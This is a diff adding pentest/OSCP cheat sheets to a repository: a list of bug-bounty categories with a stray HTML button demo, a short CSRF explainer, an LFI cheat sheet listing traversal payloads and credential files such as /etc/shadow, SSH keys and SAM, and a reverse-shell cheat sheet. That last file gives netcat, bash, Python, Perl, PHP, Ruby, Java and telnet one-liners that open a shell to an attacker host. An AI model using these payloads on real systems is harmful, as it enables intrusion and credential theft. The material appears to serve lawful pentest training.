CTF Resources and Scripts for OSCP

resources/bug_checks.md

@@ -0,0 +1,63 @@
+* [X] [P1] 	Server Security Misconfiguration	Using Default Credentials	
+
+:ballot_box_with_check: P1	Server-Side Injection	File Inclusion	Local
+
+:ballot_box_with_check: P1	Server-Side Injection	 Remote Code Execution (RCE)	
+
+:ballot_box_with_check: P1	Server-Side Injection	 SQL Injection	
+
+:ballot_box_with_check: P1	Server-Side Injection   	XML External Entity Injection (XXE)	
+
+:ballot_box_with_check: P1	Broken Authentication and Session Management	Authentication Bypass	
+
+:ballot_box_with_check: P1	Sensitive Data Exposure	Critically Sensitive Data	Password Disclosure
+
+:ballot_box_with_check: P1	Sensitive Data Exposure	Critically Sensitive Data	Private API Keys
+
+:ballot_box_with_check: P1	Insecure OS/Firmware	Command Injection	
+
+:ballot_box_with_check: P1	Insecure OS/Firmware	Hardcoded Password	Privileged User
+
+:ballot_box_with_check: P1	Broken Cryptography	Cryptographic Flaw	Incorrect Usage
+
+:ballot_box_with_check: P1	Automotive Security Misconfiguration	Infotainment	PII Leakage
+
+:ballot_box_with_check: P1	Automotive Security Misconfiguration	RF Hub	Key Fob Cloning
+
+
+<!DOCTYPE html>
+<html>
+<head>
+<style>
+.button {
+  background-color: #4CAF50; /* Green */
+  border: none;
+  color: white;
+  padding: 15px 32px;
+  text-align: center;
+  text-decoration: none;
+  display: inline-block;
+  font-size: 16px;
+  margin: 4px 2px;
+  cursor: pointer;
+}
+
+.button2 {background-color: #008CBA;} /* Blue */
+.button3 {background-color: #f44336;} /* Red */ 
+.button4 {background-color: #e7e7e7; color: black;} /* Gray */ 
+.button5 {background-color: #555555;} /* Black */
+</style>
+</head>
+<body>
+
+<h2>Button Colors</h2>
+<p>Change the background color of a button with the background-color property:</p>
+
+<button class="button">Green</button><br>
+<button class="button button2">Blue</button>
+<button class="button button3">Red</button>
+<button class="button button4">Gray</button>
+<button class="button button5">Black</button>
+
+</body>
+</html>

resources/csrf.md

@@ -0,0 +1,7 @@
+### CSRF
+*****
+
+CSRF (Cross site request forgery) is the vulnerability that tricks the user to submit the malicious request if there is no implementation of the Anti-CSRF tokens in the forms or site. When implemented your website https://vulnerables.com will include a random generated number or token to every page which is impossible to guess by the attacker so https://vulnerables.com will include it when they serve it to you. It differs each time they serve any page to anybody so attacker won’t be able to generate a valid request because of the wrong token.
+
+### What is CSRF attack?
+CSRF is an attack that tricks the victim to send a malicious request this request can change the victim information like Email, Username, Passwords and etc…

resources/lfi.md

@@ -0,0 +1,48 @@
+# LFI Cheat Sheet
+
+[LINK](https://xapax.gitbooks.io/security/content/local_file_inclusion.html)
+### Useful LFI files
+../../../../../etc/passwd%00
+
+### Linux:
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+
+### Apache:
+#### Configuration Files:
+/etc/apache2/apache2.conf
+/usr/local/etc/apache2/httpd.conf
+/etc/httpd/conf/httpd.conf
+
+### Log Files:
+### Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log
+### Debian/Ubuntu-   /var/log/apache2/access.log
+### FreeBSD-   /var/log/httpd-access.log
+
+### Generic:
+/var/log/apache/access.log
+/var/log/apache/error.log
+/var/log/apache2/access.log
+/var/log/apache/error.log
+
+### MySql:
+/var/lib/mysql/mysql/user.frm
+/var/lib/mysql/mysql/user.MYD
+/var/lib/mysql/mysql/user.MYI
+
+### Windows:
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+/windows/panther/unattended.xml
+/windows/panther/unattend/unattended.xml

resources/rvshell.md

@@ -0,0 +1,54 @@
+# Reverse Shell Cheat Sheet
+***********
+### Netcat:
+nc 192.168.1.10 443 -e /bin/bash
+
+/bin/sh | nc 192.168.1.10 443
+
+rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.10 443 0/tmp/p
+
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
+
+### Bash:
+bash -i >& /dev/tcp/192.168.1.10/443 0>&1
+
+/bin/bash -i > /dev/tcp/192.168.1.10/443 0<&1 2>&1
+
+0<&196;exec 196<>/dev/tcp/192.168.1.10/443; sh <&196 >&196 2>&196
+
+exec 5<>/dev/tcp/192.168.1.10/443
+cat <&5 | while read line; do $line 2>&5 >&5; done
+
+exec 5<>/dev/tcp/192.168.1.10/443
+cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
+
+### Python:
+python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.10”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
+
+### Perl:
+*nix:
+perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
+
+### Windows:
+perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”192.168.1.10-IP:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
+
+perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
+
+### PHP:
+php -r ‘$sock=fsockopen(“192.168.1.10”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’
+
+### Ruby:
+ruby -rsocket -e’f=TCPSocket.open(“192.168.1.10”,443).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
+
+### Windows
+ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
+
+### Java:
+r = Runtime.getRuntime()
+p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
+p.waitFor()
+
+### Telnet:
+rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.10 443 0/tmp/p
+
+telnet 192.168.1.10 443 | /bin/bash | telnet 192.168.1.10 443